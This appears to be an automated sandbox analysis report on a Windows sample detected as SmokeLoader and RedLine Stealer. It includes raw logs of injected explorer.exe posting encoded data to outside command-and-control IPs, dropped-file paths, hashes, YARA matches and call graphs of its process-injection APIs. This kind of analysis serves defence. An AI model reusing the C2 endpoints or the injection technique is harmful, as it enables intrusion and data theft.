                                                          2024-07-19 11:47:04 UTC685INData Raw: 30 49 33 52 50 6e 34 64 37 42 44 52 46 48 31 45 6d 78 66 6d 6f 48 79 32 78 77 4f 67 49 49 37 31 77 33 56 7a 46 37 61 6a 35 4e 6d 35 4e 4f 30 30 62 49 46 65 39 67 66 58 65 45 57 79 31 64 67 41 50 55 36 6f 6a 39 58 76 7a 68 50 54 69 52 59 6d 35 39 42 62 72 71 7a 65 34 64 6e 6f 6f 4b 5a 7a 42 68 77 31 43 54 5a 48 4b 38 73 35 79 61 62 53 58 59 54 65 77 56 57 37 63 47 50 53 58 54 61 75 57 4e 6d 66 68 58 62 32 32 31 6c 38 33 35 46 78 42 54 34 41 32 4d 39 36 54 55 4f 59 48 7a 54 46 62 4c 43 54 6a 64 54 2b 66 71 73 77 62 64 54 4a 45 33 59 59 34 51 41 51 37 74 72 50 71 46 79 51 6f 70 43 4b 58 54 69 6a 5a 51 75 73 41 51 68 59 38 32 53 35 48 58 34 58 62 64 41 35 58 63 49 59 52 63 6c 31 59 2b 6a 6f 50 6b 54 41 76 46 54 58 43 44 62 2f 48 74 42 43 65 77 6c 69 64 5a 47
                                                          Data Ascii: 0I3RPn4d7BDRFH1EmxfmoHy2xwOgII71w3VzF7aj5Nm5NO00bIFe9gfXeEWy1dgAPU6oj9XvzhPTiRYm59Bbrqze4dnooKZzBhw1CTZHK8s5yabSXYTewVW7cGPSXTauWNmfhXb221l835FxBT4A2M96TUOYHzTFbLCTjdT+fqswbdTJE3YY4QAQ7trPqFyQopCKXTijZQusAQhY82S5HX4XbdA5XcIYRcl1Y+joPkTAvFTXCDb/HtBCewlidZG


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          83192.168.2.557895107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:47:05 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:47:05 UTC1122OUTData Raw: 65 75 49 63 4e 67 76 79 6a 78 62 4c 2b 77 30 63 34 66 4b 5a 78 61 6a 73 75 67 4e 68 69 37 30 45 34 54 43 77 35 54 50 32 4d 55 64 4e 44 77 74 35 54 36 59 2f 74 62 78 4a 4f 38 2f 46 46 6d 4b 4f 66 49 50 47 48 6c 36 7a 6e 4e 42 76 57 70 6d 56 4b 76 57 41 67 35 33 5a 78 44 32 71 6a 51 47 45 44 46 64 78 33 61 64 77 76 39 47 55 31 69 54 66 71 6b 6f 7a 4f 59 4c 52 6e 44 48 6b 6b 7a 70 49 4b 74 34 46 45 34 59 63 33 6e 53 6d 30 61 46 50 34 45 4f 44 4b 4e 74 39 6a 4e 6b 57 2f 71 39 4f 54 31 43 4f 68 64 44 58 70 32 48 31 56 7a 4a 4d 47 33 2f 64 2f 43 57 56 36 42 59 63 2b 4b 38 75 57 6b 48 4f 6e 30 2f 6e 65 38 71 70 4f 66 4e 55 6d 47 6d 2b 6d 69 6c 48 45 70 31 48 74 53 76 36 4a 6b 43 39 66 72 6f 55 6f 4b 4e 44 5a 65 63 35 71 39 70 6d 63 6d 71 6f 41 43 6f 30 42 79 63
                                                          Data Ascii: euIcNgvyjxbL+w0c4fKZxajsugNhi70E4TCw5TP2MUdNDwt5T6Y/tbxJO8/FFmKOfIPGHl6znNBvWpmVKvWAg53ZxD2qjQGEDFdx3adwv9GU1iTfqkozOYLRnDHkkzpIKt4FE4Yc3nSm0aFP4EODKNt9jNkW/q9OT1COhdDXp2H1VzJMG3/d/CWV6BYc+K8uWkHOn0/ne8qpOfNUmGm+milHEp1HtSv6JkC9froUoKNDZec5q9pmcmqoACo0Byc
                                                          2024-07-19 11:47:06 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:47:06 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:47:06 UTC685INData Raw: 43 39 6e 4b 44 51 45 78 79 36 31 52 39 61 6d 30 46 6d 55 66 6f 75 69 76 79 72 56 4b 76 70 6a 46 67 33 41 78 58 68 42 39 4b 52 78 54 6b 55 4a 4b 5a 6b 45 71 56 6d 4c 31 54 38 76 31 73 4e 76 75 46 44 45 6c 34 59 75 37 50 42 41 41 56 55 35 6f 76 69 4c 35 66 71 50 6f 74 2f 55 6a 58 4b 76 6b 69 6f 76 68 41 66 34 7a 73 75 77 4a 38 71 61 31 57 63 56 54 6b 74 71 46 4d 4d 71 63 49 66 54 50 6c 65 6a 4f 46 43 77 39 76 7a 6d 35 32 54 66 56 37 6a 31 53 75 51 66 69 6e 69 54 4c 6a 69 79 62 43 39 5a 4a 4e 4c 57 64 4a 46 6c 4b 49 49 4e 2f 38 50 4a 4c 61 4a 75 30 58 56 44 69 6e 50 4a 63 30 6b 50 4f 43 35 52 46 67 38 49 2b 36 5a 6b 70 6d 4f 45 4c 68 51 4d 4d 37 2f 6b 43 5a 76 67 34 4d 54 72 75 47 30 4e 61 51 41 71 32 49 45 4e 35 48 6c 73 31 4d 45 45 76 33 6f 54 31 41 73 48
                                                          Data Ascii: C9nKDQExy61R9am0FmUfouivyrVKvpjFg3AxXhB9KRxTkUJKZkEqVmL1T8v1sNvuFDEl4Yu7PBAAVU5oviL5fqPot/UjXKvkiovhAf4zsuwJ8qa1WcVTktqFMMqcIfTPlejOFCw9vzm52TfV7j1SuQfiniTLjiybC9ZJNLWdJFlKIIN/8PJLaJu0XVDinPJc0kPOC5RFg8I+6ZkpmOELhQMM7/kCZvg4MTruG0NaQAq2IEN5Hls1MEEv3oT1AsH


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          84192.168.2.557896167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:47:07 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:47:07 UTC1267OUTData Raw: 70 4f 6b 56 6b 32 50 36 46 54 71 6a 64 2b 2b 46 77 48 68 41 51 55 52 49 31 43 37 30 30 62 77 61 31 2b 58 43 63 74 6b 75 4b 34 32 45 39 39 77 48 6f 37 32 43 7a 57 43 65 4a 63 72 51 6d 69 54 31 75 4b 67 7a 4f 33 72 49 32 70 4d 57 67 43 66 50 54 4f 77 65 6c 50 52 48 72 32 61 67 61 47 55 38 52 44 6c 79 2b 5a 75 43 68 72 2b 5a 54 53 6d 70 48 4c 59 70 42 72 4d 65 4b 6c 51 38 6a 4e 30 59 76 30 70 2f 42 68 76 38 41 33 79 54 61 4d 73 59 45 4d 48 72 70 4e 50 62 42 72 52 31 33 64 46 58 76 76 41 53 62 56 64 68 50 45 30 4c 6e 49 47 76 44 55 57 70 6f 4e 75 6d 32 53 75 4c 2f 4c 51 58 43 69 47 55 58 59 4b 33 72 4f 32 36 55 79 2f 47 79 78 56 43 39 6a 38 34 77 4e 47 38 43 77 69 72 2b 76 42 34 4a 6e 72 69 59 4a 4d 36 45 57 34 34 6e 74 38 33 32 61 47 42 56 31 61 2b 69 45 6b
                                                          Data Ascii: pOkVk2P6FTqjd++FwHhAQURI1C700bwa1+XCctkuK42E99wHo72CzWCeJcrQmiT1uKgzO3rI2pMWgCfPTOwelPRHr2agaGU8RDly+ZuChr+ZTSmpHLYpBrMeKlQ8jN0Yv0p/Bhv8A3yTaMsYEMHrpNPbBrR13dFXvvASbVdhPE0LnIGvDUWpoNum2SuL/LQXCiGUXYK3rO26Uy/GyxVC9j84wNG8Cwir+vB4JnriYJM6EW44nt832aGBV1a+iEk
                                                          2024-07-19 11:47:08 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:47:08 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:47:08 UTC685INData Raw: 7a 43 30 70 4d 6f 68 47 55 75 73 53 44 67 30 45 7a 48 72 37 54 32 4a 53 32 54 4b 4f 4d 33 6f 52 32 39 4a 67 4b 7a 6d 41 59 33 73 47 6f 50 41 51 54 68 56 6b 2f 39 58 31 67 47 75 73 42 68 4a 30 4a 65 48 57 4f 55 34 64 45 4e 4d 56 72 39 46 62 58 59 6d 6b 66 43 6e 4b 30 2b 43 2b 47 66 4c 55 76 46 49 44 72 6f 41 44 6c 32 4a 4b 56 4e 2f 70 2b 69 73 79 4f 6e 37 45 6a 30 72 72 42 75 68 5a 56 61 4c 51 38 36 6f 74 56 4b 38 44 68 52 33 4f 56 64 6c 67 38 6c 31 63 49 45 41 46 75 79 4b 50 66 68 71 32 62 59 6e 61 31 62 6d 2b 63 4c 59 67 6f 56 43 70 46 6f 49 42 44 4f 6c 66 78 38 51 54 6e 45 51 42 6c 63 42 70 2f 56 32 4a 68 59 71 36 6d 65 67 49 37 6b 77 59 50 5a 72 39 2b 32 4c 6c 4f 7a 36 72 51 56 6c 39 55 74 39 5a 6e 64 4f 58 45 50 47 41 7a 43 58 6a 54 2f 45 6f 66 34 56
                                                          Data Ascii: zC0pMohGUusSDg0EzHr7T2JS2TKOM3oR29JgKzmAY3sGoPAQThVk/9X1gGusBhJ0JeHWOU4dENMVr9FbXYmkfCnK0+C+GfLUvFIDroADl2JKVN/p+isyOn7Ej0rrBuhZVaLQ86otVK8DhR3OVdlg8l1cIEAFuyKPfhq2bYna1bm+cLYgoVCpFoIBDOlfx8QTnEQBlcBp/V2JhYq6megI7kwYPZr9+2LlOz6rQVl9Ut9ZndOXEPGAzCXjT/Eof4V


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:07:42:59
                                                          Start date:19/07/2024
                                                          Path:C:\Users\user\Desktop\cOm0MmeV34.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\cOm0MmeV34.exe"
                                                          Imagebase:0x400000
                                                          File size:242'688 bytes
                                                          MD5 hash:B31900FFD17C8B2ECFAA9B7B6F4CDCA3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2143851890.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2143935688.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2143935688.0000000002220000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2144344301.00000000022F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2144060492.0000000002241000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2144060492.0000000002241000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:07:43:07
                                                          Start date:19/07/2024
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff674740000
                                                          File size:5'141'208 bytes
                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:4
                                                          Start time:07:43:25
                                                          Start date:19/07/2024
                                                          Path:C:\Users\user\AppData\Roaming\tcgcuca
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\tcgcuca
                                                          Imagebase:0x400000
                                                          File size:242'688 bytes
                                                          MD5 hash:B31900FFD17C8B2ECFAA9B7B6F4CDCA3
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2371154176.0000000003CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2370964551.0000000002118000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2371203663.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2371203663.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 34%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:07:44:07
                                                          Start date:19/07/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\5587.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\5587.exe
                                                          Imagebase:0x7ff6a78d0000
                                                          File size:991'232 bytes
                                                          MD5 hash:606F1EF4B610D9D6869EE7158CCA9D7A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 5%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:07:44:07
                                                          Start date:19/07/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:07:45:36
                                                          Start date:19/07/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\5587.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\5587.exe"
                                                          Imagebase:0x7ff6a78d0000
                                                          File size:991'232 bytes
                                                          MD5 hash:606F1EF4B610D9D6869EE7158CCA9D7A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:07:45:36
                                                          Start date:19/07/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:07:45:44
                                                          Start date:19/07/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\5587.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\5587.exe"
                                                          Imagebase:0x7ff6a78d0000
                                                          File size:991'232 bytes
                                                          MD5 hash:606F1EF4B610D9D6869EE7158CCA9D7A
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:07:45:44
                                                          Start date:19/07/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:7.9%
                                                            Dynamic/Decrypted Code Coverage:40.7%
                                                            Signature Coverage:54.2%
                                                            Total number of Nodes:118
                                                            Total number of Limit Nodes:3
                                                            execution_graph 3679 2200001 3680 2200005 3679->3680 3685 220092b GetPEB 3680->3685 3682 2200030 3687 220003c 3682->3687 3686 2200972 3685->3686 3686->3682 3688 2200049 3687->3688 3689 2200e0f 2 API calls 3688->3689 3690 2200223 3689->3690 3691 2200d90 GetPEB 3690->3691 3692 2200238 VirtualAlloc 3691->3692 3693 2200265 3692->3693 3694 22002ce VirtualProtect 3693->3694 3696 220030b 3694->3696 3695 2200439 VirtualFree 3699 22004be LoadLibraryA 3695->3699 3696->3695 3698 22008c7 3699->3698 3700 402e63 3703 402e67 3700->3703 3701 401918 8 API calls 3702 402f44 3701->3702 3703->3701 3703->3702 3747 401543 3757 401546 3747->3757 3748 4015e6 NtDuplicateObject 3749 401603 NtCreateSection 3748->3749 3758 401702 3748->3758 3750 401683 NtCreateSection 3749->3750 3751 401629 NtMapViewOfSection 3749->3751 3753 4016af 3750->3753 3750->3758 3751->3750 3752 40164c NtMapViewOfSection 3751->3752 3752->3750 3754 40166a 3752->3754 3755 4016b9 NtMapViewOfSection 3753->3755 3753->3758 3754->3750 3756 4016e0 NtMapViewOfSection 3755->3756 3755->3758 3756->3758 3757->3748 3757->3758 3807 401924 3808 401929 3807->3808 3809 40195e Sleep 3808->3809 3810 401979 3809->3810 3811 401538 7 API calls 3810->3811 3812 40198a 3810->3812 3811->3812 3704 2200005 3705 220092b GetPEB 3704->3705 3706 2200030 3705->3706 3707 220003c 7 API calls 3706->3707 3708 2200038 3707->3708 3641 22ffb86 3642 22ffb95 3641->3642 3645 2300326 3642->3645 3651 2300341 3645->3651 3646 230034a CreateToolhelp32Snapshot 3647 2300366 Module32First 3646->3647 3646->3651 3648 2300375 3647->3648 3649 22ffb9e 3647->3649 3652 22fffe5 3648->3652 3651->3646 3651->3647 3653 2300010 3652->3653 3654 2300021 VirtualAlloc 3653->3654 3655 2300059 3653->3655 3654->3655 3655->3655 3656 402fe9 3657 403140 3656->3657 3658 403013 3656->3658 3658->3657 3659 4030ce RtlCreateUserThread NtTerminateProcess 3658->3659 3659->3657 3725 401496 3726 401447 3725->3726 3726->3725 3727 4015e6 NtDuplicateObject 3726->3727 3734 40152f 3726->3734 3728 401603 NtCreateSection 3727->3728 3727->3734 3729 401683 NtCreateSection 3728->3729 3730 401629 NtMapViewOfSection 3728->3730 3732 4016af 3729->3732 3729->3734 3730->3729 3731 40164c NtMapViewOfSection 3730->3731 3731->3729 3733 40166a 3731->3733 3732->3734 3735 4016b9 NtMapViewOfSection 3732->3735 3733->3729 3735->3734 3736 4016e0 NtMapViewOfSection 3735->3736 3736->3734 3619 402eb7 3620 402eb8 3619->3620 3621 402f44 3620->3621 3623 401918 3620->3623 3624 401929 3623->3624 3625 40195e Sleep 3624->3625 3626 401979 3625->3626 3628 40198a 3626->3628 3629 401538 3626->3629 3628->3621 3630 401539 3629->3630 3631 4015e6 NtDuplicateObject 3630->3631 3638 401702 3630->3638 3632 401603 NtCreateSection 3631->3632 3631->3638 3633 401683 NtCreateSection 3632->3633 3634 401629 NtMapViewOfSection 3632->3634 3636 4016af 3633->3636 3633->3638 3634->3633 3635 40164c NtMapViewOfSection 3634->3635 3635->3633 3637 40166a 3635->3637 3636->3638 3639 4016b9 NtMapViewOfSection 3636->3639 3637->3633 3638->3628 3639->3638 3640 4016e0 NtMapViewOfSection 3639->3640 3640->3638 3660 220003c 3661 2200049 3660->3661 3673 2200e0f SetErrorMode SetErrorMode 3661->3673 3666 2200265 3667 22002ce VirtualProtect 3666->3667 3669 220030b 3667->3669 3668 2200439 VirtualFree 3672 22004be LoadLibraryA 3668->3672 3669->3668 3671 22008c7 3672->3671 3674 2200223 3673->3674 3675 2200d90 3674->3675 3676 2200dad 3675->3676 3677 2200dbb GetPEB 3676->3677 3678 2200238 VirtualAlloc 3676->3678 3677->3678 3678->3666 3709 4014de 3710 401447 3709->3710 3711 4015e6 NtDuplicateObject 3710->3711 3720 40152f 3710->3720 3712 401603 NtCreateSection 3711->3712 3711->3720 3713 401683 NtCreateSection 3712->3713 3714 401629 NtMapViewOfSection 3712->3714 3716 4016af 3713->3716 3713->3720 3714->3713 3715 40164c NtMapViewOfSection 3714->3715 3715->3713 3717 40166a 3715->3717 3718 4016b9 NtMapViewOfSection 3716->3718 3716->3720 3717->3713 3719 4016e0 NtMapViewOfSection 3718->3719 3718->3720 3719->3720

                                                            Executed Functions

                                                            Function 00401496 Relevance: 10.7, APIs: 7, Instructions: 247nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 85 401496-4014a5 86 4014a7 85->86 87 40151b-40152d 85->87 89 4014a9-4014b5 86->89 90 4014cf 86->90 97 4014ba 87->97 98 40152f-401535 87->98 93 401471-401472 89->93 94 4014b7-4014b8 89->94 91 4014d6 90->91 91->91 95 4014d8 91->95 96 401473-401484 93->96 94->97 99 401449 94->99 95->87 101 40147b-40148e call 4011b7 96->101 103 401447-401456 97->103 104 4014bc-4014c3 97->104 99->101 102 40144b 99->102 101->85 107 40144c-401470 102->107 103->107 108 4014c5-4014c8 104->108 109 401539-401567 104->109 107->96 108->90 119 401558-401563 109->119 120 40156a-401590 call 4011b7 109->120 119->120 127 401592 120->127 128 401595-40159a 120->128 127->128 130 4015a0-4015b1 128->130 131 4018b8-4018c0 128->131 135 4018b6-4018c5 130->135 136 4015b7-4015e0 130->136 131->128 138 4018da 135->138 139 4018cb-4018d6 135->139 136->135 144 4015e6-4015fd NtDuplicateObject 136->144 138->139 141 4018dd-401915 call 4011b7 138->141 139->141 144->135 146 401603-401627 NtCreateSection 144->146 148 401683-4016a9 NtCreateSection 146->148 149 401629-40164a NtMapViewOfSection 146->149 148->135 153 4016af-4016b3 148->153 149->148 151 40164c-401668 NtMapViewOfSection 149->151 151->148 154 40166a-401680 151->154 153->135 156 4016b9-4016da NtMapViewOfSection 153->156 154->148 156->135 158 4016e0-4016fc NtMapViewOfSection 156->158 158->135 161 401702 call 401707 158->161
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$CreateDuplicateObjectView
                                                            • String ID:
                                                            • API String ID: 1652636561-0
                                                            • Opcode ID: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                            • Instruction ID: 8e4940cc2d5d294876689a6a874cb0cc3c399929e81e9dec1e5d288c8cd9e9dd
                                                            • Opcode Fuzzy Hash: 5edb7204c22a8cfb94061bf161a88c3eca98da374ec15d8cd8ba2bf42dcd3747
                                                            • Instruction Fuzzy Hash: F481B375500244BBEB209F91CC44FAB7BB8FF85704F10412AF952BA2F1E7749901CB69
                                                            Function 00401538 Relevance: 10.7, APIs: 7, Instructions: 207nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 163 401538-401567 169 401558-401563 163->169 170 40156a-401590 call 4011b7 163->170 169->170 177 401592 170->177 178 401595-40159a 170->178 177->178 180 4015a0-4015b1 178->180 181 4018b8-4018c0 178->181 185 4018b6-4018c5 180->185 186 4015b7-4015e0 180->186 181->178 188 4018da 185->188 189 4018cb-4018d6 185->189 186->185 194 4015e6-4015fd NtDuplicateObject 186->194 188->189 191 4018dd-401915 call 4011b7 188->191 189->191 194->185 196 401603-401627 NtCreateSection 194->196 198 401683-4016a9 NtCreateSection 196->198 199 401629-40164a NtMapViewOfSection 196->199 198->185 203 4016af-4016b3 198->203 199->198 201 40164c-401668 NtMapViewOfSection 199->201 201->198 204 40166a-401680 201->204 203->185 206 4016b9-4016da NtMapViewOfSection 203->206 204->198 206->185 208 4016e0-4016fc NtMapViewOfSection 206->208 208->185 211 401702 call 401707 208->211
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401663
                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016A4
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D5
                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2142258375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_cOm0MmeV34.jbxd
                                                            Similarity
                                                            • API ID: Section$View$Create$DuplicateObject
                                                            • String ID:
                                                            • API String ID: 1546783058-0
                                                            • Opcode ID: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                            • Instruction ID: 71a4d0092025beca94809e07d65936591d52f1bb8effc294688e3fcd05e54c36
                                                            • Opcode Fuzzy Hash: 4af5c640631db37ac51d1c1afd1ab74928840835cbc445bb96c3204467379d38
                                                            • Instruction Fuzzy Hash: E0615171900204FBEB209F95CC89FAF7BB8FF85700F10412AF912BA2E5D6759905DB65
                                                            Function 004014DE Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 213 4014de-4014ed 214 401563 213->214 215 4014ef 213->215 218 40156a-401590 call 4011b7 214->218 216 401551-401552 215->216 217 4014f1-401502 215->217 216->214 220 401504-401516 217->220 221 40151d-40152d 217->221 236 401592 218->236 237 401595-40159a 218->237 223 40151b-40151c 220->223 226 4014ba 221->226 227 40152f-401535 221->227 223->221 229 401447-401456 226->229 230 4014bc-4014c3 226->230 239 40144c-401470 229->239 233 4014c5-4014c8 230->233 234 401539-401567 230->234 235 4014cf 233->235 234->218 252 401558-401560 234->252 240 4014d6 235->240 236->237 248 4015a0-4015b1 237->248 249 4018b8-4018c0 237->249 251 401473-401484 239->251 240->240 243 4014d8 240->243 243->223 259 4018b6-4018c5 248->259 260 4015b7-4015e0 248->260 249->237 256 40147b-4014a5 call 4011b7 251->256 252->214 256->223 271 4014a7 256->271 263 4018da 259->263 264 4018cb-4018d6 259->264 260->259 272 4015e6-4015fd NtDuplicateObject 260->272 263->264 267 4018dd-401915 call 4011b7 263->267 264->267 271->235 274 4014a9-4014b5 271->274 272->259 275 401603-401627 NtCreateSection 272->275 277 401471-401472 274->277 278 4014b7-4014b8 274->278 279 401683-4016a9 NtCreateSection 275->279 280 401629-40164a NtMapViewOfSection 275->280 277->251 278->226 282 401449 278->282 279->259 285 4016af-4016b3 279->285 280->279 283 40164c-401668 NtMapViewOfSection 280->283 282->256 286 40144b 282->286 283->279 287 40166a-401680 283->287 285->259 289 4016b9-4016da NtMapViewOfSection 285->289 286->239 287->279 289->259 291 4016e0-4016fc NtMapViewOfSection 289->291 291->259 294 401702 call 401707 291->294
                                                            APIs
                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
